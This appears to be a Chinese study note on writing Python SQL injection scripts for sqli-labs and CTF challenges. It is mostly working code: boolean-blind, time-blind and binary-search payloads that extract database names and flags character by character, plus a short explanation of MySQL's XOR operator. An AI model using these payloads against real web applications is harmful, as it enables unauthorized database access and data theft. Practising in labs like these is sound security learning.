SQL注入脚本编写
穷举
1.bool盲注脚本(post型)
import requests
url = "http://127.0.0.1/sqli-labs-master/Less-15/"
result =""
for i in range(1,10):
for j in range(65,150):
payload1 = "0'^(ascii(substr(database(),{},1))>{})^1#".format(i,j)
payload2 = "admin'^(ascii(mid(database()from {}))>{})^1%23".format(i,j)
data = {"uname":payload1,"passwd":"123"}
r = requests.post(url,data=data)
if "slap.jpg" in r.text:
result += chr(j)
print (result)
break
用到了位运算符 (^)
原理:
我们高中的时候学习的数学逻辑。异或就是一种逻辑运算,运算法则概括起来说就是:两个条件相同(同真或同假)即为假(0),两个条件不同即为真(1),null与任何条件做异或运算都为null,如果从数学的角度理解就是,空集与任何集合的交集都为空。
mysql`里异或运算符为`^` 或者 `xor
下面我在本地的环境测试一下
两个同为真的条件做异或,结果为假
两个同为假的条件做异或,结果为假
一个条件为真,一个条件为假,结果为真
null与所有条件做异或结果都为null
2.bool (get型)
import requests
import string
str1 = '1234567890' + string.ascii_letters + string.punctuation
flag = ''
url = "http://a92ea67c-bde8-4b3c-9049-a486d2ff191d.chall.ctf.show/"
for j in range(1, 88):
for i in str1:
paylaod = "0' or (if(substr((select flag from web2.flag),{},1)='{}',1,0))#".format(j, i)
# print(paylaod)
data = {
'username': paylaod,
'password': 'admin'
}
r = requests.post(url, data=data)
if 'ctfshow' in r.text:
flag += i
print(flag)
break
3.时间盲注
import requests
import time
url = "http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr(database(),{},1))={},sleep(5),1)--+"
result = ''
for i in range(1,10):
for j in range(23,127):
payload = url.format(str(i),str(j))
time1 = time.time()
r = requests.get(payload)
time2 = time.time()
time3 = time2 - time1
if time3 > 4:
result += chr(j)
print (result)
break
二分法
这是网上找一个大佬的
环境:[CISCN2019 华北赛区 Day2 Web1]Hack World
我也不知道为什么我的电脑跑不出来。可能这就是菜鸡和大佬的区别吧
import requests
url = "http://d849db01-ae4b-4faa-a7e0-3ede26de2b4f.node3.buuoj.cn/index.php"
result = ""
for i in range(1,100):
min_value = 33
max_value = 130
mid = (min_value+max_value)//2 #中值
while(min_value<max_value):
payload ={"id" : "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)}
html = requests.post(url,data=payload)
print(payload)
if "Hello, glzjin wants a girlfriend." in html.text:
#ascii值比mid值大
min_value = mid+1
else:
max_value = mid
mid = (min_value+max_value)//2
#找不到目标元素时停止
if(chr(mid)==" "):
break
result += chr(mid)
print(result)
print("fina flag:",result)
下面这个是我师兄的
非常平滑,好好学习
import requests
url="http://783dfdd8-9d2e-4e68-b3df-e1b718d4a572.chall.ctf.show/"
flag=''
for i in range(1,50):
f1=flag
top=127
low=33
while low<=top:#向下整除
mid=(top+low)//2
data={'username':"admin' or if(ascii(substr((select flag from web2.flag),{},1))>{},1,0)#".format(str(i),str(mid)),'password':'admin'}
data1={'username':"admin' or if(ascii(substr((select flag from web2.flag),{},1))={},1,0)#".format(str(i),str(mid)),'password':'admin'}
try:
r1=requests.post(url,data=data1)
print(i,mid)
if 'ctfshow' in r1.text:
flag+=chr(mid)
print(flag)
break
r=requests.post(url,data=data)
if 'ctfshow' in r.text:
low=mid+1
else:
top=mid-1
except Exception as e:
pass
if flag==f1:
break